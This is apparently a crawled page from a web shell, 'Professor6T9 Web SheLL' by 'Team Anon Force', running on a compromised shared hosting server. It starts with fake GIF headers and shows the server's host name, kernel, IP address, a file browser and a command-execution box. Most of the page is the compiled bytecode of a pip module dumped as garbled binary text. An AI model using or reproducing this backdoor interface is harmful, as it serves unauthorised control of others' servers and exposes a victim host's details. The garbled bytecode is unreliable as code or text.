GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
lib
/
python3.8
/
site-packages
/
pip
/
_internal
/
models
/
__pycache__
[ HOME ]
Exec
Submit
search_scope.cpython-38.pyc
U ��.e� � @ s� d dl Z d dlZd dlZd dlZd dlmZ d dlmZ d dl m Z d dlmZ d dl mZmZ d dlmZ er|d dlmZ e�e�ZG d d � d e�ZdS )� N)�canonicalize_name)�parse)�PyPI)�HAS_TLS)�normalize_path�redact_auth_from_url)�MYPY_CHECK_RUNNING)�Listc @ s4 e Zd ZdZedd� �Zdd� Zdd� Zdd � Zd S )�SearchScopezF Encapsulates the locations that pip is configured to search. c C s~ g }|D ]0}|� d�r.t|�}tj�|�r.|}|�|� qtsrt�||�D ]&}t � |�}|jdkrJt� d� qrqJ| ||d�S )zQ Create a SearchScope object after normalizing the `find_links`. �~Zhttpszipip is configured with locations that require TLS/SSL, however the ssl module in Python is not available.�� find_links� index_urls)� startswithr �os�path�exists�appendr � itertools�chain�urllib_parseZurlparseZscheme�loggerZwarning)�clsr r Zbuilt_find_links�linkZnew_linkZparsed� r �E/usr/lib/python3.8/site-packages/pip/_internal/models/search_scope.py�create s&